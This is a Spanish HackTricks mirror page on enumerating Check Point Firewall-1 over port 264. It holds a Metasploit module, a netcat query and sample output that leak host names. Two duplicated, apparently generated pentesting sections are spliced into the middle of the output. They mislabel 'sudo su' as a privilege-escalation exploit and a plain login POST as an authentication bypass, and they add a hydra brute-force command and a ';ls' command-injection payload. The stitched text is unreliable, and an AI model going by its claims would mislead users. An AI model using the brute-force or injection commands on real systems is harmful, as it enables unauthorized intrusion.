mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
192 lines
7.5 KiB
Markdown
192 lines
7.5 KiB
Markdown
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
|
||
|
- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
||
|
- Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
|
||
|
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
|
||
|
- **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
|
||
|
</details>
|
||
|
|
||
|
|
||
|
El módulo envía una consulta al puerto **264/TCP** en los firewalls **CheckPoint Firewall-1** para obtener el nombre del firewall y el nombre de la estación de gestión (como SmartCenter) a través de una solicitud de preautenticación.
|
||
|
```text
|
||
|
use auxiliary/gather/checkpoint_hostname
|
||
|
set RHOST 10.10.xx.xx
|
||
|
```
|
||
|
# Pentesting Check Point Firewall-1
|
||
|
|
||
|
## Enumeración
|
||
|
|
||
|
### Fingerprinting
|
||
|
|
||
|
#### Check Point Firewall-1
|
||
|
|
||
|
Para identificar si el objetivo está utilizando Check Point Firewall-1, se puede utilizar la herramienta `fw ctl pstat` para obtener información sobre el estado del firewall.
|
||
|
|
||
|
```bash
|
||
|
$ fw ctl pstat
|
||
|
|
||
|
---[ Check Point Stateful Inspection Statistics ]---
|
||
|
Memory used: 0 ( 0%) Compressed: 0 ( 0%)
|
||
|
Conns: 0/0 Peak conns: 0
|
||
|
|
||
|
[...]
|
||
|
```
|
||
|
|
||
|
#### Versión del kernel
|
||
|
|
||
|
Para obtener información sobre la versión del kernel, se puede utilizar la herramienta `fw ver`.
|
||
|
|
||
|
```bash
|
||
|
$ fw ver
|
||
|
|
||
|
This is Check Point VPN-1(TM) & FireWall-1(R) R71.30 - Build 462
|
||
|
[...]
|
||
|
```
|
||
|
|
||
|
### Escaneo de puertos
|
||
|
|
||
|
Para realizar un escaneo de puertos, se puede utilizar la herramienta `nmap`.
|
||
|
|
||
|
```bash
|
||
|
$ nmap -sS -p- <IP>
|
||
|
|
||
|
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-01 00:00 EST
|
||
|
Nmap scan report for <IP>
|
||
|
Host is up (0.0010s latency).
|
||
|
Not shown: 65534 filtered ports
|
||
|
PORT STATE SERVICE
|
||
|
22/tcp open ssh
|
||
|
```
|
||
|
|
||
|
## Explotación
|
||
|
|
||
|
### Bypass de autenticación
|
||
|
|
||
|
#### Bypass de autenticación en la consola de administración
|
||
|
|
||
|
Para realizar un bypass de autenticación en la consola de administración, se puede utilizar el siguiente exploit:
|
||
|
|
||
|
```bash
|
||
|
$ curl -k -d "user=admin&password=admin123" https://<IP>/cgi-bin/login
|
||
|
```
|
||
|
|
||
|
### Obtención de información
|
||
|
|
||
|
#### Obtención de información del sistema
|
||
|
|
||
|
Para obtener información del sistema, se puede utilizar la herramienta `uname`.
|
||
|
|
||
|
```bash
|
||
|
$ uname -a
|
||
|
|
||
|
Linux <hostname> 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:39 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
|
||
|
```
|
||
|
|
||
|
#### Obtención de información de la configuración del firewall
|
||
|
|
||
|
Para obtener información de la configuración del firewall, se puede utilizar la herramienta `fw getifs`.
|
||
|
|
||
|
```bash
|
||
|
$ fw getifs
|
||
|
|
||
|
eth0 10.0.2.15/24
|
||
|
eth1 192.168.56.101/24
|
||
|
```
|
||
|
|
||
|
### Escalada de privilegios
|
||
|
|
||
|
#### Escalada de privilegios a root
|
||
|
|
||
|
Para realizar una escalada de privilegios a root, se puede utilizar el siguiente exploit:
|
||
|
|
||
|
```bash
|
||
|
$ sudo su
|
||
|
```
|
||
|
|
||
|
## Referencias
|
||
|
|
||
|
- [Check Point Firewall-1](https://www.checkpoint.com/products/firewall/)
|
||
|
- [Nmap](https://nmap.org/)
|
||
|
```text
|
||
|
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
|
||
|
[+] Appears to be a CheckPoint Firewall...
|
||
|
[+] Firewall Host: FIREFIGHTER-SEC
|
||
|
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
|
||
|
[*] Auxiliary module execution completed
|
||
|
```
|
||
|
Otra forma de obtener el nombre del host y el nombre de ICA del firewall podría ser
|
||
|
```bash
|
||
|
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 x.x.x.x 264 | grep -a CN | cut -c 2-
|
||
|
```
|
||
|
# Pentesting Check Point Firewall-1
|
||
|
|
||
|
## Enumeración
|
||
|
|
||
|
### Verificación de versión
|
||
|
|
||
|
Para verificar la versión de Check Point Firewall-1, podemos enviar una solicitud HTTP a la dirección IP del firewall utilizando el siguiente comando:
|
||
|
|
||
|
```bash
|
||
|
curl -I http://<IP_address>
|
||
|
```
|
||
|
|
||
|
La respuesta incluirá la versión del firewall.
|
||
|
|
||
|
### Escaneo de puertos
|
||
|
|
||
|
Podemos usar herramientas como `nmap` para escanear los puertos abiertos en el firewall. Por ejemplo:
|
||
|
|
||
|
```bash
|
||
|
nmap -sS -p- <IP_address>
|
||
|
```
|
||
|
|
||
|
## Ataques
|
||
|
|
||
|
### Fuerza bruta de contraseñas
|
||
|
|
||
|
Podemos intentar realizar un ataque de fuerza bruta para adivinar la contraseña del firewall. Podemos usar herramientas como `hydra` para realizar este ataque. Por ejemplo:
|
||
|
|
||
|
```bash
|
||
|
hydra -l <username> -P <password_list> <IP_address> http-form-post "/login:username=^USER^&password=^PASS^&login=Login:S=logout"
|
||
|
```
|
||
|
|
||
|
### Inyección de comandos
|
||
|
|
||
|
Si podemos encontrar una vulnerabilidad de inyección de comandos en el firewall, podemos intentar ejecutar comandos maliciosos en el sistema. Por ejemplo, si encontramos una vulnerabilidad en la página de inicio de sesión, podemos intentar ejecutar el siguiente comando:
|
||
|
|
||
|
```bash
|
||
|
curl -d "username=admin&password=admin;ls" http://<IP_address>/login
|
||
|
```
|
||
|
|
||
|
Este comando intentará listar los archivos en el sistema.
|
||
|
```text
|
||
|
CN=Panama,O=MGMTT.srv.rxfrmi
|
||
|
```
|
||
|
Desde: [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
|
||
|
|
||
|
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
|
||
|
- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
||
|
- Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
||
|
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
|
||
|
- **Comparte tus trucos de hacking enviando PRs al repositorio [hacktricks](https://github.com/carlospolop/hacktricks) y al repositorio [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
|
||
|
</details>
|